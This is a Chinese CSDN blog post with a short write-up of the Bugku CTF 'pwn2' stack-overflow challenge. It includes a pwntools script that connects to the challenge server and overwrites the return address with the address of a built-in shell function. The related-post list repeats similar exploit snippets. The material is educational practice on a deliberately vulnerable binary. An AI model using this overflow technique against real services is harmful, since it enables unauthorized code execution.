bugku pwn2

最新推荐文章于 2021-03-22 16:54:07 发布
最新推荐文章于 2021-03-22 16:54:07 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/90799964
版权

这道题是一道简单的栈溢出
直接用IDA查看
在这里插入图片描述
很明显的得到flag的函数
直接上exp

from pwn import *
p=remote('114.116.54.89',10003)
p.recvuntil('something?')
payload='a'*56+p64(0x400751)
p.sendline(payload)
p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
BugKu - pwn2
Casuall的博客
07-06 3642
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
Bugku pwn2
、moddemod
05-26 425
pwn2 题目 chmod +x pwn2 这里都关闭了,栈上可执行! 这个程序里面直接留了后门get_shell_ 思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可, 即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x
bugku-pwn2-wp
weixin_45427676的博客
04-05 333
下载完题后先在VM中checksec查看保护机制 基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数 可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。 在main函数下面有一个get_shell_()函数,打开看一下 有一个system(“cat fl...
bugku-pwn2
ro4lsc的博客
05-31 548
pwn2 首先我对pwn题完全没有了解,真萌新,所以就刷刷最基础的题目吧。 我是使用了pwndocker,第一次用没啥感觉。 docker exec -it mypwn /bin/bash wget https://ctf.bugku.com/files/ad67ac41b68c70c40d90bce4a39796e4/pwn2 checksec pwn2 这个东西我暂时看不懂,只知道这个pwn2是个64位程序 用IDA打开,找到main函数F5 int __cdecl main(int argc,
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
pwn07.ret2syscall例题
11-11
ret2syscall例题
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2328
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 272
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
bugkupwn2的write up
darui_csdn的博客
09-06 350
bugkupwn2的write up**最后效果如下:** 作为一个初出茅庐的菜鸟,做几个简单的pwn题练一下,正好学一下基础知识。 首先来看这道题,checksec一下,我们发现,没有打开什么保护。 运行一下,看看需要在哪里插入payload。 注意这里需要先赋予运行权限,笔者作为新手犯了几次错误。 把程序放进IDA中看一下套路流程。 我们在read函数这里可以使程序溢出。也看到ebp...
[BUGKU] [PWN] PWN2
Stan冲冲冲
05-18 266
[BUGKU] [PWN] PWN2 先下载文件,拉入UBUNTU,checksec检查一下 checksec pwn2 发现啥都没开,最重要的是架构是amd64 在windows里把pwn2拉入64位ida 按F5切换到伪C 注意这句话 read(0, &s, 0x100uLL); 常见的缓冲区漏洞 按shift+f12查看字符串 发现有一个cat flag 按x发现交叉引用 .text:0000000000400769 mov edi, offs
[WP]BugkuCtf - pwn2
XiaoYan8023的博客
04-27 316
1.首先运行一下该程序 2.我们权限不够于是去修改一下权限(改前,改后) (当然,这步有可能是不需要的) 3.改后我们重新运行一下(123是输入的语句) 4.拖进IDA,查看字符串,此处应该就是得到flag的地方 5.之后我们查看main函数,并没有我们刚才所看见的那句话 6.而在get_shell函数中我...
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 372
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
bugke pwn2
weixin_33858336的博客
06-05 289
根据伪代码可以看到read函数存在溢出 存在一个后面 那就直接覆盖返回地址就完事了 从ida很直观看出s的偏移为0x30 所以到到返回地址的距离就是0x30+0x8 from pwn import *#p = process('./pwn2')p=remote('114.116.54.89','10003')elf = ELF('./pwn2')flag = elf.symb...
[pwn]bugku pwn2
qq_18823653的博客
03-26 5453
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下 read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址, gdb看一下偏移rbp前四位为bAA1,算一下偏移 到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为 exp如下: from pwn ...
bugku_pwn2 | by AriSan
AriSan_XD的博客
05-02 250
bugku_pwn2栈溢出入门 | AriSan 看源码,非常明显的栈溢出 直接有后门函数 checksec后没有任何保护 使用 gdb调试,在 read 函数处下断点,运行,因为是64位的程序,得到栈空间为 RBP-RSI+8=0x70-0x40+8=56 使用垃圾数据填满栈空间后,覆盖返回地址为后门函数地址,直接执行后门函数 成功 exp: from pwn import * p ...
ctf.bugku ctf题目详解——pwn2
yeshen4328的专栏
05-26 1108
ctf.bugku ctf题目详解——pwn2 题目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解题之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
ctfshow的pwn2
最新发布
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值